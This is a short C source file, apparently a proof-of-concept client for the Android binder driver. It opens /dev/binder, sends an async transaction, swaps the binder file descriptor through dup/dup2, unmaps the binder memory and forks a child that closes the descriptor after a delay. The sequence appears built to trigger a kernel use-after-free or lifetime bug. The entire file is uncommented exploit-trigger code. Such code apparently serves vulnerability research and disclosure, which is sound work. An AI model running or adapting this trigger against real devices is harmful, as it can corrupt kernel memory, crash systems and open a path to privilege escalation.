#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>

#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#include "binder.h"


void send_request(struct binder_state* bs) {
  struct binder_io msg;
  struct binder_io reply;
  char data[0x1000];
  uint32_t handle = 0;

  int excess_fd = dup(0);
  if (excess_fd == -1) err(1, "dup");
  close(excess_fd);

  bio_init(&msg, data, sizeof(data), 4);
  bio_put_uint32(&msg, 0);
  //binder_call(bs, &msg, &reply, 0, 1);
  binder_call_async(bs, &msg, 0, 1);
  printf("async sent\n");

  //while (1) pause();
  while (1) if (close(excess_fd) == 0) break;
  printf("closed excess_fd\n");
  if (dup2(bs->fd, excess_fd) != excess_fd) err(1, "dup2");
  close(bs->fd);
  bs->fd = excess_fd;

  munmap(bs->mapped, bs->mapsize);
  bs->mapped = 0;

  printf("forking\n");
  pid_t child = fork();
  if (child == -1) err(1, "fork");
  if (child == 0) {
    usleep(7*1000*1000);
    close(excess_fd);
    exit(0);
  }

  binder_increfs(bs, 1);

  printf("fin\n");
  exit(0);
}

int main(int argc, char** argv) {
  setbuf(stdout, NULL);
  printf("client started as pid %d\n", getpid());
  printf("press enter...");
  getchar();

  struct binder_state* bs;

  fprintf(stderr, "[0] opening /dev/binder\n");
  bs = binder_open(0x400000);
  if (bs == NULL) err(1, "binder_open");

  send_request(bs);

  return 0;
}
